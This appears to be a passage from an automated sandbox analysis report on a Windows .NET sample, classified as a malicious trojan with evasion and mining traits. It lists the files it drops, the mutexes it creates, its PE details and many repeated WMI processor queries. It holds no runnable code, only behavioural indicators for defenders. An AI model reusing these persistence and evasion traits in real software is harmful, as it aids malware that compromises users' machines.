Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@103/309@24/25

Source: C:\Users\user\Desktop\zlONcFaXkc.exe

File created: C:\Users\user\AppData\Roaming\IsFixedSize

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Mutant created: \Sessions\1\BaseNamedObjects\cd738f7ec36d311b107bd6ec4b05793a
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Mutant created: \Sessions\1\BaseNamedObjects\444118017aca01d9d0dde7
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7508

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

File created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe

Jump to behavior

Source: zlONcFaXkc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: zlONcFaXkc.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
